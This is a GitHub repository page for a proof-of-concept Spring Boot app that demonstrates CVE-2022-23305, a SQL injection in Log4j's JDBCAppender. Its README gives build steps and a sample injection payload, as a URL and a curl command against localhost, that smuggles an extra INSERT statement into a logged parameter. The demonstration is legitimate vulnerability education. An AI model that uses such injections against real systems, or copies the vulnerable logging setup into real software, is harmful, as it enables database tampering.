Skip to content

tkomlodi/CVE-2022-23305_POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

src/main

src/main

 
 

Dockerfile

Dockerfile

 
 

README.md

README.md

 
 

pom.xml

pom.xml

 
 

Repository files navigation

CVE-2022-23305 Log4j JDBCAppender sql injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.
See src/main/resource folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker application such as:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:
 "http://localhost:8080/?param=');insert into logs values(':("
The return will list the added log entries, containing one that was added by the sql injected into the parameter.
To do the same with curl use:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

About

CVE-2022-23305 Log4J JDBCAppender SQl injection POC

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages